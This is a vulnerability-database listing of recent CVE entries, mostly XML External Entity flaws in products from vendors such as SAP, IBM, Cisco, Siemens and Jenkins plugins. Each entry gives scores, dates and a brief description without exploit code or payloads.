Total
1209 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-49704 | 2024-12-10 | N/A | 5.5 MEDIUM | ||
|
A vulnerability has been identified in COMOS V10.3 (All versions < V10.3.3.5.8), COMOS V10.4.0 (All versions), COMOS V10.4.1 (All versions), COMOS V10.4.2 (All versions), COMOS V10.4.3 (All versions < V10.4.3.0.47), COMOS V10.4.4 (All versions < V10.4.4.2), COMOS V10.4.4.1 (All versions < V10.4.4.1.21). The Generic Data Mapper, the Engineering Adapter, and the Engineering Interface improperly handle XML External Entity (XXE) entries when parsing configuration and mapping files. This could allow ...
Show More |
|||||
| CVE-2024-47582 | 2024-12-10 | N/A | 5.3 MEDIUM | ||
|
Due to missing validation of XML input, an unauthenticated attacker could send malicious input to an endpoint which leads to XML Entity Expansion attack. This causes limited impact on availability of the application.
|
|||||
| CVE-2024-40075 | 2024-12-02 | N/A | 4.3 MEDIUM | ||
|
Laravel v11.x was discovered to contain an XML External Entity (XXE) vulnerability.
|
|||||
| CVE-2024-52806 | 2024-12-02 | N/A | 8.3 HIGH | ||
|
SimpleSAMLphp SAML2 library is a PHP library for SAML2 related functionality. When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE. This vulnerability is fixed in 4.6.14 and 5.0.0-alpha.18.
|
|||||
| CVE-2024-52596 | 2024-12-02 | N/A | N/A | ||
|
SimpleSAMLphp xml-common is a common classes for handling XML-structures. When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE. This vulnerability is fixed in 1.19.0.
|
|||||
| CVE-2024-52800 | 2024-11-29 | N/A | N/A | ||
|
veraPDF is an open source PDF/A validation library. Executing policy checks using custom schematron files via the CLI invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability. This doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only l ...
Show More |
|||||
| CVE-2024-9044 | 2024-11-29 | N/A | N/A | ||
|
A XML External Entity (XXE) vulnerability has been identified in Easy Tax Client Software 2023 1.2 and earlier across multiple platforms, including Windows, Linux, and macOS.
|
|||||
| CVE-2018-16303 | 1 Pdf-xchange | 1 Pdf-xchange Editor | 2024-11-27 | 5.0 MEDIUM | 7.5 HIGH |
|
PDF-XChange Editor through 7.0.326.1 allows remote attackers to cause a denial of service (resource consumption) via a crafted x:xmpmeta structure, a related issue to CVE-2003-1564.
|
|||||
| CVE-2022-20938 | 1 Cisco | 1 Secure Firewall Management Center | 2024-11-26 | N/A | 4.3 MEDIUM |
|
A vulnerability in the module import function of the administrative interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to view sensitive information.
This vulnerability is due to insufficient validation of the XML syntax when importing a module. An attacker could exploit this vulnerability by supplying a specially crafted XML file to the function. A successful exploit could allow the attacker to read sensitive data that would normally n ...
Show More |
|||||
| CVE-2024-6961 | 2024-11-25 | N/A | 5.9 MEDIUM | ||
|
RAIL documents are an XML-based format invented by Guardrails AI to enforce formatting checks on LLM outputs. Guardrails users that consume RAIL documents from external sources are vulnerable to XXE, which may cause leakage of internal file data via the SYSTEM entity.
|
|||||
| CVE-2024-10218 | 2024-11-22 | N/A | N/A | ||
|
XSS Attack in mar.jar, Monitoring Archive Utility (MAR Utility), monitoringconsolecommon.jar in TIBCO Software Inc TIBCO Hawk and TIBCO Operational Intelligence
|
|||||
| CVE-2024-6893 | 1 Journyx | 1 Journyx | 2024-11-21 | N/A | 7.5 HIGH |
|
The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
|
|||||
| CVE-2024-5625 | 2024-11-21 | N/A | 6.5 MEDIUM | ||
|
Improper Restriction of XML External Entity Reference vulnerability in PruvaSoft Informatics Apinizer Management Console allows Data Serialization External Entities Blowup.This issue affects Apinizer Management Console: before 2024.05.1.
|
|||||
| CVE-2024-3930 | 1 Perforce | 1 Akana Api | 2024-11-21 | N/A | 6.3 MEDIUM |
|
In versions of Akana API Platform prior to 2024.1.0 a flaw resulting in XML External Entity (XXE) was discovered.
|
|||||
| CVE-2024-38374 | 2024-11-21 | N/A | 7.5 HIGH | ||
|
The CycloneDX core module provides a model representation of the SBOM along with utilities to assist in creating, validating, and parsing SBOMs. Before deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection. This vulnerability has been fixed ...
Show More |
|||||
| CVE-2024-37388 | 1 Dnkorpushov | 1 Ebookmeta | 2024-11-21 | N/A | 9.1 CRITICAL |
|
An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of lxml before v4.9.1 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.
|
|||||
| CVE-2024-34345 | 2024-11-21 | N/A | 8.1 HIGH | ||
|
The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External entity injections were possible, when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1.
|
|||||
| CVE-2024-29010 | 2024-11-21 | N/A | 7.1 HIGH | ||
|
The XML document processed in the GMS ECM URL endpoint is vulnerable to XML external entity (XXE) injection, potentially resulting in the disclosure of sensitive information.
This issue affects GMS: 9.3.4 and earlier versions.
|
|||||
| CVE-2024-28039 | 2024-11-21 | N/A | 5.8 MEDIUM | ||
|
Improper restriction of XML external entity references vulnerability exists in FitNesse all releases, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition.
|
|||||
| CVE-2024-27266 | 1 Ibm | 1 Maximo Application Suite | 2024-11-21 | N/A | 8.2 HIGH |
|
IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566.
|
|||||
| CVE-2024-24743 | 1 Sap | 1 Netweaver Application Server Java | 2024-11-21 | N/A | 8.6 HIGH |
|
SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.
|
|||||
| CVE-2024-21796 | 1 Dfeg | 1 Electronic Deliverables Creation Support Tool | 2024-11-21 | N/A | 5.5 MEDIUM |
|
Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
|
|||||
| CVE-2024-1167 | 1 Seweurodrive | 1 Movitools Motionstudio | 2024-11-21 | N/A | 5.5 MEDIUM |
|
When SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information unrestricted file access can occur.
|
|||||
| CVE-2023-6836 | 1 Wso2 | 7 Api Manager, Api Manager Analytics, Api Microgateway and 4 more | 2024-11-21 | N/A | 4.6 MEDIUM |
|
Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.
|
|||||
| CVE-2023-6721 | 1 Europeana | 1 Repox | 2024-11-21 | N/A | 8.3 HIGH |
|
An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system.
|
|||||
| CVE-2023-6280 | 1 52north | 1 Wps | 2024-11-21 | N/A | 7.2 HIGH |
|
An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.
|
|||||
| CVE-2023-6194 | 1 Eclipse | 1 Memory Analyzer | 2024-11-21 | N/A | 2.8 LOW |
|
In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit
document type definition (DTD) references to external entities.
This means that if a user chooses to use a malicious report definition XML file containing an external entity reference
to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.
|
|||||
| CVE-2023-6149 | 1 Qualys | 1 Web Application Screening | 2024-11-21 | N/A | 5.7 MEDIUM |
|
Qualys Jenkins Plugin for WAS prior to version and including 2.0.11 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the respons ...
Show More |
|||||
| CVE-2023-5136 | 1 Ni | 4 Diadem, Flexlogger, Topografix Data Plugin and 1 more | 2024-11-21 | N/A | 5.5 MEDIUM |
|
An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure. An attacker could exploit this vulnerability by getting a user to open a specially crafted data file.
|
|||||
| CVE-2023-52252 | 1 Unifiedremote | 1 Unified Remote | 2024-11-21 | N/A | 9.8 CRITICAL |
|
Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint.
|
|||||
| CVE-2023-50304 | 1 Ibm | 2 Engineering Requirements Management Doors, Engineering Requirements Management Doors Web Access | 2024-11-21 | N/A | 7.1 HIGH |
|
IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335.
|
|||||
| CVE-2023-4554 | 3 Linux, Microsoft, Opentext | 3 Linux Kernel, Windows, Appbuilder | 2024-11-21 | N/A | 4.9 MEDIUM |
|
Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows, Linux allows Server Side Request Forgery, Probe System Files.
AppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery, disclose files local to the server that processes them.
This issue affects AppBuilder: from 21.2 before 23.2.
|
|||||
| CVE-2023-4218 | 1 Eclipse | 3 Eclipse Ide, Org.eclipse.core.runtime, Pde | 2024-11-21 | N/A | 5.0 MEDIUM |
|
In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
|
|||||
| CVE-2023-49656 | 1 Jenkins | 1 Matlab | 2024-11-21 | N/A | 9.8 CRITICAL |
|
Jenkins MATLAB Plugin 2.11.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
|
|||||
| CVE-2023-48362 | 1 Apache | 1 Drill | 2024-11-21 | N/A | 8.8 HIGH |
|
XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file.
Users are recommended to upgrade to version 1.21.2, which fixes this issue.
|
|||||
| CVE-2023-46802 | 1 Nta | 1 E-tax | 2024-11-21 | N/A | 5.5 MEDIUM |
|
e-Tax software Version3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser. By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
|
|||||
| CVE-2023-46590 | 1 Siemens | 1 Siemens Opc Ua Modeling Editor | 2024-11-21 | N/A | 7.5 HIGH |
|
A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8). Affected products suffer from a XML external entity (XXE) injection vulnerability. This vulnerability could allow an attacker to interfere with an application's processing of XML data and read arbitrary files in the system.
|
|||||
| CVE-2023-46502 | 1 Opencrx | 1 Opencrx | 2024-11-21 | N/A | 9.8 CRITICAL |
|
An issue in openCRX v.5.2.2 allows a remote attacker to read internal files and execute server side request forgery attack via insecure DocumentBuilderFactory.
|
|||||
| CVE-2023-46265 | 1 Ivanti | 1 Avalanche | 2024-11-21 | N/A | 9.8 CRITICAL |
|
An unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF).
|
|||||
| CVE-2023-45612 | 1 Jetbrains | 1 Ktor | 2024-11-21 | N/A | 8.6 HIGH |
|
In JetBrains Ktor before 2.3.5 default configuration of ContentNegotiation with XML format was vulnerable to XXE
|
|||||